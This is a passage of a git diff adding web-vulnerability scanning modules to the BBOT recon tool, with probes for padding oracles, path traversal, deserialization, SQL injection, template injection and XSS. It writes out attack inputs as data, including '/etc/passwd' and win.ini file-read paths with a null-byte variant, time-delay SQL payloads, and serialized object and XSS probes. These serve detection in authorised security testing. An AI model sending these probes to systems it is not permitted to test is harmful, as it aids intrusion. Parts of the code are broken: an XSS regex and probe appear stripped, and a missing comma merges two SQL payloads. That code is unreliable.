position + modified_data = bytes(byte_list) + else: + raise ValueError("Unsupported action") + return CryptoLightfuzz.format_agnostic_encode(modified_data, encoding) + + def is_likely_encrypted(self, data, threshold=4.5): + entropy = self.lightfuzz.helpers.calculate_entropy(data) + return entropy >= threshold + + def cryptanalysis(self, input_string): + likely_crypto = False + possible_block_cipher = False + data, encoding = self.format_agnostic_decode(input_string) + likely_crypto = self.is_likely_encrypted(data) + data_length = len(data) + if data_length % 8 == 0: + possible_block_cipher = True + return likely_crypto, possible_block_cipher + + @staticmethod + def possible_block_sizes(ciphertext_length): + potential_block_sizes = [8, 16] + possible_sizes = [] + for block_size in potential_block_sizes: + num_blocks = ciphertext_length // block_size + if ciphertext_length % block_size == 0 and num_blocks >= 2: + possible_sizes.append(block_size) + return possible_sizes + + async def padding_oracle_execute(self, original_data, encoding, block_size, cookies, possible_first_byte=True): + ivblock = b"\x00" * block_size + paddingblock = b"\x00" * block_size + datablock = original_data[-block_size:] + if possible_first_byte: + baseline_byte = b"\xff" + starting_pos = 0 + else: + baseline_byte = b"\x00" + starting_pos = 1 + baseline = self.compare_baseline( + self.event.data["type"], + self.format_agnostic_encode(ivblock + paddingblock[:-1] + baseline_byte + datablock, encoding), + cookies, + ) + differ_count = 0 + for i in range(starting_pos, starting_pos + 254): + byte = bytes([i]) + oracle_probe = await self.compare_probe( + baseline, + self.event.data["type"], + self.format_agnostic_encode(ivblock + paddingblock[:-1] + byte + datablock, encoding), + cookies, + ) + if oracle_probe[0] is False and "body" in oracle_probe[1]: + differ_count += 1 + + if i == 2: + if possible_first_byte is True: + # Thats two results which appear "different". 
Since this is the first run, it's entirely possible \x00 was the correct padding. + # We will break from this loop and redo it with the last byte as the baseline instead of the first + return None + else: + # Now that we have tried the run twice, we know it can't be because the first byte was the correct padding, and we know it is not vulnerable + return False + if differ_count == 1: + return True + return False + + async def padding_oracle(self, probe_value, cookies): + data, encoding = self.format_agnostic_decode(probe_value) + possible_block_sizes = self.possible_block_sizes(len(data)) + + for block_size in possible_block_sizes: + padding_oracle_result = await self.padding_oracle_execute(data, encoding, block_size, cookies) + if padding_oracle_result is None: + self.lightfuzz.debug( + "still could be in a possible_first_byte situation - retrying with different first byte" + ) + padding_oracle_result = await self.padding_oracle_execute( + data, encoding, block_size, cookies, possible_first_byte=False + ) + + if padding_oracle_result is True: + context = f"Lightfuzz Cryptographic Probe Submodule detected a probable padding oracle vulnerability after manipulating parameter: [{self.event.data['name']}]" + self.results.append( + { + "type": "VULNERABILITY", + "severity": "HIGH", + "description": f"Padding Oracle Vulnerability. 
Block size: [{str(block_size)}] {self.metadata()}", + "context": context, + } + ) + + async def error_string_search(self, text_dict, baseline_text): + matching_techniques = set() + matching_strings = set() + + for label, text in text_dict.items(): + matched_strings = self.lightfuzz.helpers.string_scan(self.crypto_error_strings, text) + for m in matched_strings: + matching_strings.add(m) + matching_techniques.add(label) + context = f"Lightfuzz Cryptographic Probe Submodule detected a cryptographic error after manipulating parameter: [{self.event.data['name']}]" + if len(matching_strings) > 0: + false_positive_check = self.lightfuzz.helpers.string_scan(self.crypto_error_strings, baseline_text) + false_positive_matches = set(matched_strings) & set(false_positive_check) + if not false_positive_matches: + self.results.append( + { + "type": "FINDING", + "description": f"Possible Cryptographic Error. {self.metadata()} Strings: [{','.join(matching_strings)}] Detection Technique(s): [{','.join(matching_techniques)}]", + "context": context, + } + ) + self.lightfuzz.debug( + f"Aborting cryptographic error reporting - baseline_text already contained detected string(s) ({','.join(false_positive_check)})" + ) + + @staticmethod + def identify_hash_function(hash_bytes): + hash_length = len(hash_bytes) + hash_functions = { + 16: hashlib.md5, + 20: hashlib.sha1, + 32: hashlib.sha256, + 48: hashlib.sha384, + 64: hashlib.sha512, + } + + if hash_length in hash_functions: + return hash_functions[hash_length] + + async def fuzz(self): + + cookies = self.event.data.get("assigned_cookies", {}) + probe_value = self.incoming_probe_value(populate_empty=False) + + if not probe_value: + self.lightfuzz.debug( + f"The Cryptography Probe Submodule requires original value, aborting [{self.event.data['type']}] [{self.event.data['name']}]" + ) + return + + baseline_probe = await self.baseline_probe(cookies) + if not baseline_probe: + self.lightfuzz.warning(f"Couldn't get baseline_probe for url 
{self.event.data['url']}, aborting") + return + + try: + truncate_probe_value = self.modify_string(probe_value, action="truncate") + mutate_probe_value = self.modify_string(probe_value, action="mutate") + except ValueError as e: + self.lightfuzz.debug( + f"Encountered error modifying value for parameter [{self.event.data['name']}]: {e} , aborting" + ) + return + + # Basic crypanalysis + likely_crypto, possible_block_cipher = self.cryptanalysis(probe_value) + + if not likely_crypto: + self.lightfuzz.debug("Parameter value does not appear to be cryptographic, aborting tests") + return + + http_compare = self.compare_baseline(self.event.data["type"], probe_value, cookies) + + # Cryptographic Response Divergence Test + try: + arbitrary_probe = await self.compare_probe(http_compare, self.event.data["type"], "AAAAAAA", cookies) + truncate_probe = await self.compare_probe( + http_compare, self.event.data["type"], truncate_probe_value, cookies + ) + mutate_probe = await self.compare_probe(http_compare, self.event.data["type"], mutate_probe_value, cookies) + except HttpCompareError as e: + self.lightfuzz.warning(f"Encountered HttpCompareError Sending Compare Probe: {e}") + return + + confirmed_techniques = [] + if mutate_probe[0] is False and "body" in mutate_probe[1]: + if (http_compare.compare_body(mutate_probe[3].text, arbitrary_probe[3].text) is False) or mutate_probe[ + 3 + ].text == "": + confirmed_techniques.append("Single-byte Mutation") + + if mutate_probe[0] is False and "body" in mutate_probe[1]: + if (http_compare.compare_body(truncate_probe[3].text, arbitrary_probe[3].text) is False) or truncate_probe[ + 3 + ].text == "": + confirmed_techniques.append("Data Truncation") + + if confirmed_techniques: + context = f"Lightfuzz Cryptographic Probe Submodule detected a parameter ({self.event.data['name']}) to appears to drive a cryptographic operation" + self.results.append( + { + "type": "FINDING", + "description": f"Probable Cryptographic Parameter. 
{self.metadata()} Detection Technique(s): [{', '.join(confirmed_techniques)}]", + "context": context, + } + ) + + # Cryptographic Error String Test + await self.error_string_search( + {"truncate value": truncate_probe[3].text, "mutate value": mutate_probe[3].text}, baseline_probe.text + ) + + if confirmed_techniques or ( + "padding" in truncate_probe[3].text.lower() or "padding" in mutate_probe[3].text.lower() + ): + # Padding Oracle Test + + if possible_block_cipher: + self.lightfuzz.debug( + "Attempting padding oracle exploit since it looks like a block cipher and we have confirmed crypto" + ) + await self.padding_oracle(probe_value, cookies) + + # Hash identification / Potential Length extension attack + + data, encoding = CryptoLightfuzz.format_agnostic_decode(probe_value) + hash_function = self.identify_hash_function(data) + if hash_function: + hash_instance = hash_function() + # if there are any hash functions which match the length, we check the additional parameters to see if they cause identical changes + # this would indicate they are being used to generate the hash + if ( + hash_function + and "additional_params" in self.event.data.keys() + and self.event.data["additional_params"] + ): + for additional_param_name, additional_param_value in self.event.data["additional_params"].items(): + try: + additional_param_probe = await self.compare_probe( + http_compare, + self.event.data["type"], + probe_value, + cookies, + additional_params_override={additional_param_name: additional_param_value + "A"}, + ) + except HttpCompareError as e: + self.lightfuzz.warning(f"Encountered HttpCompareError Sending Compare Probe: {e}") + continue + # the additional parameter affects the potential hash parameter (suggesting its calculated in the hash) + if additional_param_probe[0] is False and (additional_param_probe[1] == mutate_probe[1]): + context = f"Lightfuzz Cryptographic Probe Submodule detected a parameter ({self.event.data['name']}) that is a likely a hash, which is 
connected to another parameter {additional_param_name})" + self.results.append( + { + "type": "FINDING", + "description": f"Possible {self.event.data['type']} parameter with {hash_instance.name.upper()} Hash as value. {self.metadata()}, linked to additional parameter [{additional_param_name}]", + "context": context, + } + ) diff --git a/bbot/modules/lightfuzz_submodules/path.py b/bbot/modules/lightfuzz_submodules/path.py new file mode 100644 index 0000000000..827af65f2f --- /dev/null +++ b/bbot/modules/lightfuzz_submodules/path.py @@ -0,0 +1,120 @@ +from .base import BaseLightfuzz +from bbot.errors import HttpCompareError + +import re +from urllib.parse import quote + + +class PathTraversalLightfuzz(BaseLightfuzz): + async def fuzz(self): + cookies = self.event.data.get("assigned_cookies", {}) + probe_value = self.incoming_probe_value(populate_empty=False) + if not probe_value: + self.lightfuzz.debug( + f"Path Traversal detection requires original value, aborting [{self.event.data['type']}] [{self.event.data['name']}]" + ) + return + + # Single dot traversal tolerance test + path_techniques = { + "single-dot traversal tolerance (no-encoding)": { + "singledot_payload": f"./a/../{probe_value}", + "doubledot_payload": f"../a/../{probe_value}", + }, + "single-dot traversal tolerance (no-encoding, leading slash)": { + "singledot_payload": f"/./a/../{probe_value}", + "doubledot_payload": f"/../a/../{probe_value}", + }, + "single-dot traversal tolerance (url-encoding)": { + "singledot_payload": quote(f"./a/../{probe_value}".encode(), safe=""), + "doubledot_payload": quote(f"../a/../{probe_value}".encode(), safe=""), + }, + "single-dot traversal tolerance (url-encoding, leading slash)": { + "singledot_payload": quote(f"/./a/../{probe_value}".encode(), safe=""), + "doubledot_payload": quote(f"/../a/../{probe_value}".encode(), safe=""), + }, + "single-dot traversal tolerance (non-recursive stripping)": { + "singledot_payload": f"...//a/....//{probe_value}", + 
"doubledot_payload": f"....//a/....//{probe_value}", + }, + "single-dot traversal tolerance (non-recursive stripping, leading slash)": { + "singledot_payload": f"/...//a/....//{probe_value}", + "doubledot_payload": f"/....//a/....//{probe_value}", + }, + "single-dot traversal tolerance (double url-encoding)": { + "singledot_payload": f".%252fa%252f..%252f{probe_value}", + "doubledot_payload": f"..%252fa%252f..%252f{probe_value}", + }, + "single-dot traversal tolerance (double url-encoding, leading slash)": { + "singledot_payload": f"%252f.%252fa%252f..%252f{probe_value}", + "doubledot_payload": f"%252f..%252fa%252f..%252f{probe_value}", + }, + } + + linux_path_regex = re.match(r"\/(?:\w+\/?)+\.\w+", probe_value) + if linux_path_regex is not None: + original_path_only = "/".join(probe_value.split("/")[:-1]) + original_filename_only = probe_value.split("/")[-1] + path_techniques["single-dot traversal tolerance (start of path validation)"] = { + "singledot_payload": f"{original_path_only}/./{original_filename_only}", + "doubledot_payload": f"{original_path_only}/../{original_filename_only}", + } + + for path_technique, payloads in path_techniques.items(): + iterations = 5 # one failed detection is tolerated, as long as its not the first run + confirmations = 0 + while iterations > 0: + try: + http_compare = self.compare_baseline(self.event.data["type"], probe_value, cookies) + singledot_probe = await self.compare_probe( + http_compare, self.event.data["type"], payloads["singledot_payload"], cookies + ) + doubledot_probe = await self.compare_probe( + http_compare, self.event.data["type"], payloads["doubledot_payload"], cookies + ) + + if ( + singledot_probe[0] is True + and doubledot_probe[0] is False + and doubledot_probe[3] is not None + and doubledot_probe[1] != ["header"] + and "The requested URL was rejected" not in doubledot_probe[3].text + ): + confirmations += 1 + self.lightfuzz.verbose( + f"Got possible Path Traversal detection: [{str(confirmations)}] 
Confirmations" + ) + if confirmations > 3: + self.results.append( + { + "type": "FINDING", + "description": f"POSSIBLE Path Traversal. {self.metadata()} Detection Method: [{path_technique}]", + } + ) + # no need to report both techniques if they both work + break + except HttpCompareError as e: + iterations -= 1 + self.lightfuzz.debug(e) + continue + + iterations -= 1 + if confirmations == 0: + break + + # Absolute path test + absolute_paths = { + r"c:\\windows\\win.ini": "; for 16-bit app support", + "/etc/passwd": "daemon:x:", + "../../../../../etc/passwd%00.png": "daemon:x:", + } + + for path, trigger in absolute_paths.items(): + r = await self.standard_probe(self.event.data["type"], cookies, path) + if r and trigger in r.text: + self.results.append( + { + "type": "FINDING", + "description": f"POSSIBLE Path Traversal. {self.metadata()} Detection Method: [Absolute Path: {path}]", + } + ) diff --git a/bbot/modules/lightfuzz_submodules/serial.py b/bbot/modules/lightfuzz_submodules/serial.py new file mode 100644 index 0000000000..e6cf2da765 --- /dev/null +++ b/bbot/modules/lightfuzz_submodules/serial.py @@ -0,0 +1,66 @@ +from .base import BaseLightfuzz +from bbot.errors import HttpCompareError + + +class SerialLightfuzz(BaseLightfuzz): + async def fuzz(self): + cookies = self.event.data.get("assigned_cookies", {}) + control_payload = "DEADBEEFCAFEBABE1234567890ABCDEF" + serialization_payloads = { + "php_base64": "YTowOnt9", + "php_raw": "a:0:{}", + "java_hex": "ACED00057372000E6A6176612E6C616E672E426F6F6C65616ECD207EC0D59CF6EE02000157000576616C7565787000", + "java_base64": "rO0ABXNyABFqYXZhLmxhbmcuQm9vbGVhbs0gcoDVnPruAgABWgAFdmFsdWV4cAA=", + "java_base64_string_error": "rO0ABXQABHRlc3Q=", + "java_base64_OptionalDataException": "rO0ABXcEAAAAAAEAAAABc3IAEGphdmEudXRpbC5IYXNoTWFwAAAAAAAAAAECAAJMAARrZXkxYgABAAAAAAAAAAJ4cHcBAAAAB3QABHRlc3Q=", + "java_hex_OptionalDataException": 
"ACED0005737200106A6176612E7574696C2E486173684D617000000000000000012000014C00046B6579317A00010000000000000278707000000774000474657374", + "dotnet_hex": "0001000000ffffffff01000000000000000601000000076775737461766f0b", + "dotnet_base64": "AAEAAAD/////AQAAAAAAAAAGAQAAAAdndXN0YXZvCw==", + "ruby_base64": "BAh7BjoKbE1FAAVJsg==", + } + + serialization_errors = [ + "invalid user", + "cannot cast java.lang.string", + "dump format error", + "java.io.optionaldataexception", + ] + + probe_value = self.incoming_probe_value(populate_empty=False) + if probe_value: + self.lightfuzz.debug( + f"The Serialization Submodule only operates when there if no original value, aborting [{self.event.data['type']}] [{self.event.data['name']}]" + ) + return + + http_compare = self.compare_baseline(self.event.data["type"], control_payload, cookies) + for type, payload in serialization_payloads.items(): + try: + serialization_probe = await self.compare_probe(http_compare, self.event.data["type"], payload, cookies) + if serialization_probe[0] is False and serialization_probe[1] != ["header"]: + if ( + serialization_probe[3].status_code == 200 + and "code" in serialization_probe[1] + and "The requested URL was rejected" not in serialization_probe[3].text + ): + self.results.append( + { + "type": "FINDING", + "description": f"POSSIBLE Unsafe Deserialization. {self.metadata()} Technique: [Error Resolution] Serialization Payload: [{type}]", + } + ) + elif serialization_probe[3].status_code == 500 or ( + serialization_probe[3].status_code == 200 and serialization_probe[1] == ["body"] + ): + for serialization_error in serialization_errors: + if serialization_error in serialization_probe[3].text.lower(): + self.results.append( + { + "type": "FINDING", + "description": f"POSSIBLE Unsafe Deserialization. 
{self.metadata()} Technique: [Differential Error Analysis] Error-String: [{serialization_error}] Payload: [{type}]", + } + ) + break + except HttpCompareError as e: + self.lightfuzz.debug(e) + continue diff --git a/bbot/modules/lightfuzz_submodules/sqli.py b/bbot/modules/lightfuzz_submodules/sqli.py new file mode 100644 index 0000000000..1f7d677cce --- /dev/null +++ b/bbot/modules/lightfuzz_submodules/sqli.py @@ -0,0 +1,139 @@ +from .base import BaseLightfuzz +from bbot.errors import HttpCompareError + +import statistics + + +class SQLiLightfuzz(BaseLightfuzz): + expected_delay = 5 + sqli_error_strings = [ + "Unterminated string literal", + "Failed to parse string literal", + "error in your SQL syntax", + "syntax error at or near", + "Unknown column", + "unterminated quoted string", + "Unclosed quotation mark", + "Incorrect syntax near", + "SQL command not properly ended", + "string not properly terminated", + ] + + def evaluate_delay(self, mean_baseline, measured_delay): + margin = 1.5 + if ( + mean_baseline + self.expected_delay - margin + <= measured_delay + <= mean_baseline + self.expected_delay + margin + ): + return True + # check for exactly twice the delay, in case the statement gets placed in the query twice + elif ( + mean_baseline + (self.expected_delay * 2) - margin + <= measured_delay + <= mean_baseline + (self.expected_delay * 2) + margin + ): + return True + else: + return False + + async def fuzz(self): + cookies = self.event.data.get("assigned_cookies", {}) + probe_value = self.incoming_probe_value(populate_empty=True) + http_compare = self.compare_baseline( + self.event.data["type"], probe_value, cookies, additional_params_populate_empty=True + ) + + try: + single_quote = await self.compare_probe( + http_compare, + self.event.data["type"], + f"{probe_value}'", + cookies, + additional_params_populate_empty=True, + ) + double_single_quote = await self.compare_probe( + http_compare, + self.event.data["type"], + f"{probe_value}''", + cookies, + 
additional_params_populate_empty=True, + ) + + if single_quote[0] is False: + for sqli_error_string in self.sqli_error_strings: + if sqli_error_string.lower() in single_quote[3].text.lower(): + self.results.append( + { + "type": "FINDING", + "description": f"Possible SQL Injection. {self.metadata()} Detection Method: [SQL Error Detection] Detected String: [{sqli_error_string}]", + } + ) + break + + if single_quote[3] and double_single_quote[3]: + if "code" in single_quote[1] and (single_quote[3].status_code != double_single_quote[3].status_code): + self.results.append( + { + "type": "FINDING", + "description": f"Possible SQL Injection. {self.metadata()} Detection Method: [Single Quote/Two Single Quote]", + } + ) + else: + self.lightfuzz.debug("Failed to get responses for both single_quote and double_single_quote") + except HttpCompareError as e: + self.lightfuzz.warning(f"Encountered HttpCompareError Sending Compare Probe: {e}") + + standard_probe_strings = [ + f"'||pg_sleep({str(self.expected_delay)})--", # postgres + f"1' AND (SLEEP({str(self.expected_delay)})) AND '", # mysql + f"' AND (SELECT FROM DBMS_LOCK.SLEEP({str(self.expected_delay)})) AND '1'='1" # oracle (not tested) + f"; WAITFOR DELAY '00:00:{str(self.expected_delay)}'--", # mssql (not tested) + ] + + baseline_1 = await self.standard_probe( + self.event.data["type"], cookies, probe_value, additional_params_populate_empty=True + ) + baseline_2 = await self.standard_probe( + self.event.data["type"], cookies, probe_value, additional_params_populate_empty=True + ) + + if baseline_1 and baseline_2: + baseline_1_delay = baseline_1.elapsed.total_seconds() + baseline_2_delay = baseline_2.elapsed.total_seconds() + mean_baseline = statistics.mean([baseline_1_delay, baseline_2_delay]) + + for p in standard_probe_strings: + confirmations = 0 + for i in range(0, 3): + r = await self.standard_probe( + self.event.data["type"], + cookies, + f"{probe_value}{p}", + additional_params_populate_empty=True, + timeout=20, + 
) + if not r: + self.lightfuzz.debug("delay measure request failed") + break + + d = r.elapsed.total_seconds() + self.lightfuzz.debug(f"measured delay: {str(d)}") + if self.evaluate_delay(mean_baseline, d): + confirmations += 1 + self.lightfuzz.debug( + f"{self.event.data['url']}:{self.event.data['name']}:{self.event.data['type']} Increasing confirmations, now: {str(confirmations)} " + ) + else: + break + + if confirmations == 3: + self.results.append( + { + "type": "FINDING", + "description": f"Possible Blind SQL Injection. {self.metadata()} Detection Method: [Delay Probe ({p})]", + } + ) + + else: + self.lightfuzz.debug("Could not get baseline for time-delay tests") diff --git a/bbot/modules/lightfuzz_submodules/ssti.py b/bbot/modules/lightfuzz_submodules/ssti.py new file mode 100644 index 0000000000..766356b583 --- /dev/null +++ b/bbot/modules/lightfuzz_submodules/ssti.py @@ -0,0 +1,18 @@ +from .base import BaseLightfuzz + + +class SSTILightfuzz(BaseLightfuzz): + async def fuzz(self): + + cookies = self.event.data.get("assigned_cookies", {}) + ssti_probes = ["<%25%3d%201337*1337%20%25>","<%= 1337*1337 %>", "${1337*1337}", "%24%7b1337*1337%7d", "1,787{{z}},569"] + for probe_value in ssti_probes: + r = await self.standard_probe(self.event.data["type"], cookies, probe_value, allow_redirects=True) + if r and ("1787569" in r.text or "1,787,569" in r.text): + self.results.append( + { + "type": "FINDING", + "description": f"POSSIBLE Server-side Template Injection. 
{self.metadata()} Detection Method: [Integer Multiplication] Payload: [{probe_value}]", + } + ) + break \ No newline at end of file diff --git a/bbot/modules/lightfuzz_submodules/xss.py b/bbot/modules/lightfuzz_submodules/xss.py new file mode 100644 index 0000000000..9ac606e488 --- /dev/null +++ b/bbot/modules/lightfuzz_submodules/xss.py @@ -0,0 +1,102 @@ +from .base import BaseLightfuzz + +import re + + +class XSSLightfuzz(BaseLightfuzz): + def determine_context(self, cookies, html, random_string): + between_tags = False + in_tag_attribute = False + in_javascript = False + + between_tags_regex = re.compile(rf"<(\/?\w+)[^>]*>.*?{random_string}.*?<\/?\w+>") + in_tag_attribute_regex = re.compile(rf'<(\w+)\s+[^>]*?(\w+)="([^"]*?{random_string}[^"]*?)"[^>]*>') + in_javascript_regex = re.compile( + rf"]*>(?:(?!<\/script>)[\s\S])*?{random_string}(?:(?!<\/script>)[\s\S])*?<\/script>" + ) + + between_tags_match = re.search(between_tags_regex, html) + if between_tags_match: + between_tags = True + + in_tag_attribute_match = re.search(in_tag_attribute_regex, html) + if in_tag_attribute_match: + in_tag_attribute = True + + in_javascript_regex = re.search(in_javascript_regex, html) + if in_javascript_regex: + in_javascript = True + + return between_tags, in_tag_attribute, in_javascript + + async def check_probe(self, cookies, probe, match, context): + probe_result = await self.standard_probe(self.event.data["type"], cookies, probe) + if probe_result and match in probe_result.text: + self.results.append( + { + "type": "FINDING", + "description": f"Possible Reflected XSS. 
Parameter: [{self.event.data['name']}] Context: [{context}] Parameter Type: [{self.event.data['type']}]", + } + ) + return True + return False + + async def fuzz(self): + + lightfuzz_event = self.event.parent + cookies = self.event.data.get("assigned_cookies", {}) + + # If this came from paramminer_getparams and didn't have a http_reflection tag, we don't need to check again + if ( + lightfuzz_event.type == "WEB_PARAMETER" + and str(lightfuzz_event.module) == "paramminer_getparams" + and "http-reflection" not in lightfuzz_event.tags + ): + self.lightfuzz.debug( + "Got WEB_PARAMETER from paramminer, with no reflection tag - xss is not possible, aborting" + ) + return + + reflection = None + random_string = self.lightfuzz.helpers.rand_string(8) + + reflection_probe_result = await self.standard_probe(self.event.data["type"], cookies, random_string) + if reflection_probe_result and random_string in reflection_probe_result.text: + reflection = True + + if not reflection or reflection is False: + return + + between_tags, in_tag_attribute, in_javascript = self.determine_context(cookies, reflection_probe_result.text, random_string) + self.lightfuzz.debug( + f"determine_context returned: between_tags [{between_tags}], in_tag_attribute [{in_tag_attribute}], in_javascript [{in_javascript}]" + ) + tags = ["z", "svg", "img"] + if between_tags: + for tag in tags: + between_tags_probe = f"<{tag}>{random_string}" + result = await self.check_probe(cookies, between_tags_probe, between_tags_probe, f"Between Tags ({tag} tag)") + if result is True: + break + + if in_tag_attribute: + in_tag_attribute_probe = f'{random_string}"' + in_tag_attribute_match = f'"{random_string}""' + await self.check_probe(cookies, in_tag_attribute_probe, in_tag_attribute_match, "Tag Attribute") + + + in_tag_attribute_probe = f'javascript:{random_string}' + in_tag_attribute_match = f'action="javascript:{random_string}' + await self.check_probe(cookies, in_tag_attribute_probe, in_tag_attribute_match, "Form 
Action Injection") + + if in_javascript: + in_javascript_probe = rf"" + result = await self.check_probe(cookies, in_javascript_probe, in_javascript_probe, "In Javascript") + if result is False: + in_javasscript_escape_probe = rf"a\';zzzzz({random_string})\\" + in_javasscript_escape_match = rf"a\\';zzzzz({random_string})\\" + await self.check_probe(cookies, + in_javasscript_escape_probe, + in_javasscript_escape_match, + "In Javascript (escaping the escape character)", + ) diff --git a/bbot/modules/paramminer_headers.py b/bbot/modules/paramminer_headers.py index 723bffc2e0..c5a7a4f7a2 100644 --- a/bbot/modules/paramminer_headers.py +++ b/bbot/modules/paramminer_headers.py @@ -148,6 +148,7 @@ async def process_results(self, event, results): "type": paramtype, "description": description, "name": result, + "original_value": None, }, "WEB_PARAMETER", event, diff --git a/bbot/modules/reflected_parameters.py b/bbot/modules/reflected_parameters.py new file mode 100644 index 0000000000..d13b67dad5 --- /dev/null +++ b/bbot/modules/reflected_parameters.py @@ -0,0 +1,40 @@ +from bbot.modules.base import BaseModule + + +class reflected_parameters(BaseModule): + watched_events = ["WEB_PARAMETER"] + produced_events = ["FINDING"] + flags = ["active", "safe", "web-thorough"] + meta = { + "description": "Highlight parameters that reflect their contents in response body", + "author": "@liquidsec", + "created_date": "2024-10-29", + } + + async def handle_event(self, event): + url = event.data.get("url") + from_paramminer = str(event.module) == "paramminer_getparams" + reflection_detected = ( + "http-reflection" in event.tags if from_paramminer else await self.detect_reflection(event, url) + ) + + if reflection_detected: + description = ( + f"GET Parameter value reflected in response body. 
Name: [{event.data['name']}] " + f"Source Module: [{str(event.module)}]" + ) + if event.data.get("original_value"): + description += ( + f" Original Value: [{self.helpers.truncate_string(str(event.data['original_value']), 200)}]" + ) + data = {"host": str(event.host), "description": description, "url": url} + await self.emit_event(data, "FINDING", event) + + async def detect_reflection(self, event, url): + """Detects reflection by sending a probe with a random value.""" + probe_parameter_name = event.data["name"] + probe_parameter_value = self.helpers.rand_string() + probe_url = self.helpers.add_get_params(url, {probe_parameter_name: probe_parameter_value}).geturl() + self.debug(f"reflected_parameters Probe URL: {probe_url}") + probe_response = await self.helpers.request(probe_url, method="GET") + return probe_response and probe_parameter_value in probe_response.text diff --git a/bbot/presets/web/lightfuzz-intense.yml b/bbot/presets/web/lightfuzz-intense.yml new file mode 100644 index 0000000000..f2ceb2522b --- /dev/null +++ b/bbot/presets/web/lightfuzz-intense.yml @@ -0,0 +1,30 @@ +description: Discovery web parameters and lightly fuzz them for vulnerabilities, with more intense discovery techniques + +flags: + - web-paramminer + +modules: + - httpx + - lightfuzz + - robots + - badsecrets + - hunt + - reflected_parameters + +config: + url_querystring_remove: False + url_querystring_collapse: True + web: + spider_distance: 4 + spider_depth: 5 + modules: + lightfuzz: + force_common_headers: False + enabled_submodules: [cmdi,crypto,path,serial,sqli,ssti,xss] + disable_post: False + excavate: + retain_querystring: True + +blacklist: + # Prevent spider from invalidating sessions by logging out + - "RE:/.*(sign|log)[_-]?out" \ No newline at end of file diff --git a/bbot/presets/web/lightfuzz-max.yml b/bbot/presets/web/lightfuzz-max.yml new file mode 100644 index 0000000000..6a7530c321 --- /dev/null +++ b/bbot/presets/web/lightfuzz-max.yml @@ -0,0 +1,30 @@ +description: 
Discovery web parameters and lightly fuzz them for vulnerabilities, with more intense discovery techniques + +flags: + - web-paramminer + +modules: + - httpx + - lightfuzz + - robots + - badsecrets + - hunt + - reflected_parameters + +config: + url_querystring_remove: False + url_querystring_collapse: False + web: + spider_distance: 4 + spider_depth: 5 + modules: + lightfuzz: + force_common_headers: True + enabled_submodules: [cmdi,crypto,path,serial,sqli,ssti,xss] + disable_post: False + excavate: + retain_querystring: True + +blacklist: + # Prevent spider from invalidating sessions by logging out + - "RE:/.*(sign|log)[_-]?out" \ No newline at end of file diff --git a/bbot/presets/web/lightfuzz-ssti-test.yml b/bbot/presets/web/lightfuzz-ssti-test.yml new file mode 100644 index 0000000000..1b7674d98c --- /dev/null +++ b/bbot/presets/web/lightfuzz-ssti-test.yml @@ -0,0 +1,28 @@ +description: Discovery web parameters and lightly fuzz them for vulnerabilities, with more intense discovery techniques + +modules: + - httpx + - lightfuzz + - robots + - badsecrets + - hunt + - reflected_parameters + +blacklist: + # Prevent spider from invalidating sessions by logging out + - "RE:/.*(sign|log)[_-]?out" + +config: + url_querystring_remove: False + url_querystring_collapse: True + web: + spider_distance: 6 + spider_depth: 7 + modules: + lightfuzz: + force_common_headers: False + enabled_submodules: [ssti] + disable_post: False + excavate: + retain_querystring: True + diff --git a/bbot/presets/web/lightfuzz-xss.yml b/bbot/presets/web/lightfuzz-xss.yml new file mode 100644 index 0000000000..d3c9755ee0 --- /dev/null +++ b/bbot/presets/web/lightfuzz-xss.yml @@ -0,0 +1,21 @@ +description: Discovery web parameters and lightly fuzz them for xss vulnerabilities +modules: + - httpx + - lightfuzz + - paramminer_getparams + - reflected_parameters + +config: + url_querystring_remove: False + url_querystring_collapse: False + web: + spider_distance: 4 + spider_depth: 5 + modules: + 
lightfuzz: + enabled_submodules: [xss] + disable_post: True + +blacklist: + # Prevent spider from invalidating sessions by logging out + - "RE:/.*(sign|log)[_-]?out" \ No newline at end of file diff --git a/bbot/presets/web/lightfuzz.yml b/bbot/presets/web/lightfuzz.yml new file mode 100644 index 0000000000..1c48c668ba --- /dev/null +++ b/bbot/presets/web/lightfuzz.yml @@ -0,0 +1,26 @@ +description: Discovery web parameters and lightly fuzz them for vulnerabilities, without some of the more intense discovery techniques + +modules: + - httpx + - lightfuzz + - badsecrets + - hunt + - reflected_parameters + +config: + url_querystring_remove: False + url_querystring_collapse: True + web: + spider_distance: 3 + spider_depth: 4 + modules: + lightfuzz: + force_common_headers: False + enabled_submodules: [cmdi,crypto,path,serial,sqli,ssti,xss] + disable_post: True + excavate: + retain_querystring: True + +blacklist: + # Prevent spider from invalidating sessions by logging out + - "RE:/.*(sign|log)[_-]?out" \ No newline at end of file diff --git a/bbot/presets/web/paramminer.yml b/bbot/presets/web/paramminer.yml index 7d36e3a849..442cb37aa1 100644 --- a/bbot/presets/web/paramminer.yml +++ b/bbot/presets/web/paramminer.yml @@ -5,8 +5,17 @@ flags: modules: - httpx + - reflected_parameters config: web: spider_distance: 1 spider_depth: 4 + + omit_event_types: + - HTTP_RESPONSE + - RAW_TEXT + - URL_UNVERIFIED + - DNS_NAME_UNRESOLVED + - FILESYSTEM + - RAW_DNS_RECORD diff --git a/bbot/scanner/preset/args.py b/bbot/scanner/preset/args.py index 13723ea01d..ffb0dbe3a8 100644 --- a/bbot/scanner/preset/args.py +++ b/bbot/scanner/preset/args.py @@ -161,6 +161,9 @@ def preset_from_args(self): if self.parsed.custom_headers: args_preset.core.merge_custom({"web": {"http_headers": self.parsed.custom_headers}}) + if self.parsed.custom_cookies: + args_preset.core.merge_custom({"web": {"http_cookies": self.parsed.custom_cookies}}) + if self.parsed.custom_yara_rules: 
args_preset.core.merge_custom( {"modules": {"excavate": {"custom_yara_rules": self.parsed.custom_yara_rules}}} @@ -339,6 +342,13 @@ def create_parser(self, *args, **kwargs): default=[], help="List of custom headers as key value pairs (header=value).", ) + misc.add_argument( + "-C", + "--custom-cookies", + nargs="+", + default=[], + help="List of custom cookies as key value pairs (cookie=value).", + ) misc.add_argument("--custom-yara-rules", "-cy", help="Add custom yara rules to excavate") return p @@ -381,6 +391,22 @@ def sanitize_args(self): custom_headers_dict[k] = v self.parsed.custom_headers = custom_headers_dict + # Custom Cookie Parsing / Validation + custom_cookies_dict = {} + custom_cookie_example = "Example: --custom-cookies foo=bar foo2=bar2" + + for i in self.parsed.custom_cookies: + parts = i.split("=", 1) + if len(parts) != 2: + raise ValidationError(f"Custom cookies not formatted correctly (missing '='). {custom_cookie_example}") + k, v = parts + if not k or not v: + raise ValidationError( + f"Custom cookies not formatted correctly (missing cookie name or value). {custom_cookie_example}" + ) + custom_cookies_dict[k] = v + self.parsed.custom_cookies = 